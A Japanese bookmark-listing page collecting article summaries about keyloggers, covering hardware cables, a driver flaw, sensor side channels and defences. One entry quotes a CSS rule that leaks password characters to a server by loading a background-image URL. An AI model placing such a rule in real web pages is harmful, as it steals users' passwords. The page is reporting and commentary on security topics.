「TikTokは事実上のキーロガー」と専門家、知らないうちにユーザーを侵害する「アプリ内ブラウザ」の脅威とは？

2024/03/31 224 users owa TikTok heard of the worst

開かれたインターネットを目指すソフトウェアエンジニアらによって組織された非営利団体・Open Web Advocacy(OWA)が、ユーザーの目が届かない場所でセキュリティやプライバシーを大きなリスクにさらすアプリ内ブラウザについて提言しました。 In-App Browsers: The worst erosion of user choice you haven't heard of -... 続きを読む

一見普通のUSBケーブルなのにキーボードで打ち込んだ内容をすべてWi-Fi経由で外部に送信してしまう「O.MGケーブル」が登場 - GIGAZINE

2021/09/03 300 users GIGAZINE ハッキング 悪意 挙動 外部

一見すると普通のUSBケーブルですが、実際にPCに挿すと悪意のある挙動をしてハッキングの手助けをするというのが「O.MGケーブル」です。これまでも通常のUSBケーブルと見分けがつかないO.MGケーブルが発表されていたのですが、新たにPCのキーボードに打ち込んだ内容を保存するキーロガーを内蔵し、Wi-Fi経由で入力内容を... 続きを読む

PCにキーロガーを仕掛けたり、調査員で人間関係を操作...現代の探偵会社、最新技術とエグい手法で逃げられない感がすごい - Togetter

2020/06/21 498 users 遺物 FBI pic.twitter.com 仕掛け人 過去

現代の探偵会社の調査方法、最新技術取り込まれまくってるわ、仕掛け人介入して人間関係操作してるわでもはやFBIの域。シャーロックホームズなんぞ過去の遺物レベル。狙われたら逃げられない感すごくて震える。 pic.twitter.com/5AOcaKSJXC 続きを読む

CSSだけでキーロガーを作る - R42日記

2018/02/27 361 users localhost maxchehab input URL

2018 - 02 - 21 CSSだけでキーロガーを作る https://github.com/maxchehab/CSS-Keylogging よくもまあこんなこと思いついたなw 要するに、 input [ type = "password" ][ value $= "a" ] { background-image : url( "http://localhost:3000/a" ) ; } ... 続きを読む

CSSをハックしてパスワードを盗み取るキーロガーが登場 - GIGAZINE

2018/02/23 183 users GitHub maxchehab ウェブページ フォント 登場

By Christoph Scholz CSSは、使用するフォントやパーツの色合いなどウェブページのスタイルを指定するファイルですが、そのCSSだけを用いてパスワードを盗み取るコードがGitHub上で公開されています。 GitHub - maxchehab/CSS-Keylogging: Chrome extension and Express server that exploits keylo... 続きを読む

HPのPCにキーロガー？　セキュリティ企業が指摘 - ITmedia NEWS

2017/05/12 309 users ドライバパッケージ オーディオドライバ ログファイル 指摘

全てのキー入力を記録したログファイルが、ユーザーにも読める状態で、Cドライブのフォルダ内に保存されているという。 スイスのセキュリティ企業modzeroは5月11日、HPのPC向けオーディオドライバに、入力内容を記録するキーロガーを見付けたと伝えた。 modzeroによると、問題のオーディオドライバは、半導体メーカーのConexantが開発したもので、HPのWebサイトでドライバパッケージとして提... 続きを読む

HPのPCにキーロガー？　セキュリティ企業が指摘 - ITmedia エンタープライズ

2017/05/12 309 users ドライバパッケージ オーディオドライバ ログファイル 指摘

全てのキー入力を記録したログファイルが、ユーザーにも読める状態で、Cドライブのフォルダ内に保存されているという。 スイスのセキュリティ企業modzeroは5月11日、HPのPC向けオーディオドライバに、入力内容を記録するキーロガーを見付けたと伝えた。 modzeroによると、問題のオーディオドライバは、半導体メーカーのConexantが開発したもので、HPのWebサイトでドライバパッケージとして提... 続きを読む

私がどのようにしてキーロガーをクラックし、最終的に第三者の受信トレイに行きついたか | インフラ・ミドルウェア | POSTD

2016/08/09 222 users POSTD 受信トレイ インフラ・ミドルウェア

ことの始まりは、あるスパムキャンペーンでした。画像1は、スパム向けに仕掛けた罠に最近引っかかった、疑わしいドキュメントファイルが添付されたメールです。文面の英語がとても稚拙なことに気付くかと思いますが、この稚拙さがメール受信者への警告サインとなります。 画像1：スパムサンプル 添付のファイルは、ことの始まりは、あるスパムキャンペーンでした。画像1は、スパム向けに仕掛けた罠に最近引っかかった、疑わし... 続きを読む

出先のPCなどでグーグルアカウントに安全にログインする方法 - Touch Lab - タッチ ラボ

2012/01/17 236 users 出先 Touch Lab ラボ グーグルアカウント タッチ

この方法は、Googleが提供するQRコードとiPhone(またはAndroid)を組み合わせてログイン(認証)を行うというものです。使用するPC/Mac上でアカウント名・パスワードの入力を行わないため、キーロガー(キー入力を保存するソフト)による、アカウント情報の漏洩を防ぐことができます。ログインの手順は次のとおり。 QRコードでグーグルアカウントにログインする方法準備QRコードを読み取る必要が... 続きを読む

PC横に置いたiPhoneをキーロガーに、ジョージア工科大学の研究成果が話題に | 携帯 | マイコミジャーナル

2011/10/20 352 users 助教授 キーロガー装置 iPhone 米ジョージア工科大学

ジョージア工科大学(Georgia Tech)助教授のPatrick Traynor氏と、スパイ行為が可能なキーロガー装置になった「(sp)iPhone」 米ジョージア工科大学(Georgia Institute of Technology: Georgia Tech)の研究チームらが、PCのそばにあるデスク上に置いたiPhoneの加速度センサーを使って、そのPCのキーボードで入力された文字を8割... 続きを読む

Ajaxの特徴に潜むリスクをサンプルアプリで確認しよう ― ＠IT

2006/07/18 237 users サンプルアプリ サンプルアプリケーション Ajax マウス

第1回 Ajax技術の目に見えない通信内容をのぞいてみようでは、Ajaxの技術背景を解説しました。今回は、「セキュリティ」という観点でAjaxを見ていきたいと思います。 2回目の今回は、非常に幅広く、奥が深い「Ajaxの特徴に潜むセキュリティリスク」を、実際のサンプルアプリケーションの通信や、マウスの動きを動画で見ながら、理解しましょう。スパイウェアやキーロガーへの基本的な対策も解説します。 「A... 続きを読む